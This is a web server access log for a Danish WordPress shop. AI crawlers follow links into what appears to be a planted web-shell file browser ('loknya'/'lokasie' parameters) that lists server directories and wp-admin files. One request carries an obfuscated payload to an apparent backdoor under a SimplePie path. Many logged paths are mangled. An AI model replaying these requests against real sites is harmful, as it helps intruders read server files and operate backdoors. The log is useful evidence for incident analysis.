216.73.216.125 - - [29/Jul/2026:08:37:26 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2Fe%2Fa HTTP/2" 200 1790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:26 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2Ff%2F8 HTTP/2" 200 1779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:26 +0200] "GET /index.php?loknya=/vr/www/vhosts/store-bors.dk/././././lshe HTTP/2" 200 1772 "https://store-bors.dk/index.php?loknya=/vr/www/vhosts/store-bors.dk/././././lshe/f/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:26 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2Fa%2Fe HTTP/2" 200 1788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:27 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2F8%2Ff HTTP/2" 200 1779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:27 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/1/a/e HTTP/2" 200 1998 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/1/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:37:27 +0200] "GET /index.php?loknya=/vr/www/vhosts/store-bors.dk/././././lshe/e HTTP/2" 200 1784 "https://store-bors.dk/index.php?loknya=/vr/www/vhosts/store-bors.dk/././././lshe/e/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:27 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2F1%2Ff HTTP/2" 200 1778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:27 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Flink-manager.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 3436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:27 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/7/e/e HTTP/2" 200 2057 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/7/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:27 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2F9%2Fd HTTP/2" 200 1783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:27 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/d/a HTTP/2" 200 1790 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/d/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:27 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2F0%2Ff HTTP/2" 200 1777 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:28 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/1/b/a HTTP/2" 200 1998 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/1/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:28 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F8%2Fd%2Fb HTTP/2" 200 2000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:28 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.k/././././lscache/e/a/ HTTP/2" 200 1788 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lscache/e/a/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:28 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2Fb%2Ff HTTP/2" 200 2082 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:28 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F1%2Fd%2Fb HTTP/2" 200 1996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:28 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F8%2Fb%2Fd HTTP/2" 200 1998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:29 +0200] "GET /index.php?loknya=/var/www/vhosts/stor-ors.dk/././././lscach/c HTTP/2" 200 1793 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/stor-ors.dk/././././lscach/c/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:37:29 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/2/e/a HTTP/2" 200 2106 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/2/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:29 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2Fhttpdocs%2Fabout.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2Fhttpdocs HTTP/2" 200 4520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:29 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2Ff%2Fb HTTP/2" 200 1995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:29 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/9/c/e HTTP/2" 200 2001 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/9/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:29 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.k%2Flscache%2F7%2Fb HTTP/2" 200 1780 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:29 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/e/ HTTP/2" 200 1778 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/e/f/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:29 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscche%2F7%2F5 HTTP/2" 200 1769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:30 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2Fb%2Fa HTTP/2" 200 1994 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:30 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/8/a/d HTTP/2" 200 1998 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/8/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:30 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2Fd%2F9 HTTP/2" 200 1777 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:30 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.k/././././lscache/e HTTP/2" 200 1782 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.k/././././lscache/e/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:30 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2F2%2F5 HTTP/2" 200 1779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:30 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2Fb%2F2 HTTP/2" 200 1985 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:30 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/9/e/ HTTP/2" 200 1785 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/9/e/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:37:30 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/a/e HTTP/2" 200 1791 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/a/e/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:30 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F0%2Fb%2Fd HTTP/2" 200 2133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:31 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.k%2Flscache%2Fa%2Ff HTTP/2" 200 1776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:31 +0200] "GET /bep/m/kirlist1?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flshe%2F HTTP/2" 200 1757 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:31 +0200] "GET /index.php?loknya=/vr/www/vhosts/stor-ors.dk/././././lscch HTTP/2" 200 1778 "https://store-bors.dk/index.php?loknya=/vr/www/vhosts/stor-ors.dk/././././lscch/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:37:31 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/3/a/c HTTP/2" 200 2054 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/3/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:31 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscche%2F7%2F8 HTTP/2" 200 1770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:31 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2Fd%2Ff HTTP/2" 200 1978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:31 +0200] "GET /index.php?loknya=/vr/www/vhosts/store-ors.dk/./././.// HTTP/2" 200 1768 "https://store-bors.dk/index.php?loknya=/vr/www/vhosts/store-ors.dk/././././lscche//" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:37:32 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/b/2/ HTTP/2" 200 1780 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/b/2/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:32 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstor-bors.dk%2Flsah%2F8 HTTP/2" 200 1765 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:32 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.k%2Flsahe HTTP/2" 200 1764 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:32 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/e/b HTTP/2" 200 1790 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././lsahe/e/b/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:32 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flsahe%2Ff HTTP/2" 200 1766 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:32 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/2/a/b HTTP/2" 200 1998 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/2/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:32 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstor-bors.dk%2Flsah%2F0 HTTP/2" 200 1764 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:32 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstor-bors.k%2Flscach%2Ff HTTP/2" 200 1768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:33 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/a/a HTTP/2" 200 1785 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/a/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:37:33 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/./lscache/5/a/5/5a509b0cc9a4c7b4&loknya=/var/www/vhosts/store-bors.dk/./lscache/5/a/5 HTTP/2" 200 1847 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/5/a/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:33 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscche%2F6%2F9 HTTP/2" 200 1771 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:33 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2F4%2Fa HTTP/2" 200 1792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:33 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscche%2F9%2F9 HTTP/2" 200 1769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:33 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/a/ HTTP/2" 200 1783 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/././././lscache/a/f/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:37:33 +0200] "GET /?loknya=/var/www/vhosts/stor-bors.dk/./lscach/1/a/ HTTP/2" 200 1785 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/1/a/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:33 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flsahe%2F2 HTTP/2" 200 1766 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:34 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.k%2Flscche%2Fe HTTP/2" 200 1763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:34 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././httpdocs/wp-includes/blocks/video HTTP/2" 200 2332 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././httpdocs/wp-includes/blocks" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:34 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2F2%2Fb HTTP/2" 200 1997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:34 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/ HTTP/2" 200 2206 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/5/a/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:34 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Fms-themes.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 1664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:34 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.k/././././lscache/e/a HTTP/2" 200 1786 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.k/././././lscache/e/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:37:34 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/1/b/ HTTP/2" 200 1782 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/1/b/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:34 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F3%2Fb HTTP/2" 200 2153 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:37:35 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fpatterns%2Ftext-faqs.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fpatterns HTTP/2" 200 2588 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:37:35 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-content/languages/plugins/complianz-gdpr-da_DK-aee4d2fe3eba4fab667f8cbbc1ae776b.json&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-content/languages/plugins HTTP/2" 200 2338 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-content/languages/plugins" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:35 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2Fc%2Fa HTTP/2" 200 1791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:37:35 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/2/e/ HTTP/2" 200 1784 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/2/e/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:37:35 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F%2Foptions-discussion.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2F HTTP/2" 200 6328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [29/Jul/2026:08:35:35 +0200] "GET /wp-includes/SimplePie/library/SimplePie/Net/Net/index.php?ARRAY=7o2230223n313738353331303533352p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353330363933352q6462343263356339653663393435653937663731373039613066623163346665222p2232223n223035353065336239323162373134656535373262646164306539663230643661222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34382q35392q36342q37342q38362q3131227q HTTP/1.1" 500 567 "-" "-"
216.73.216.125 - - [29/Jul/2026:08:37:35 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flsahe%2F1 HTTP/2" 200 1768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
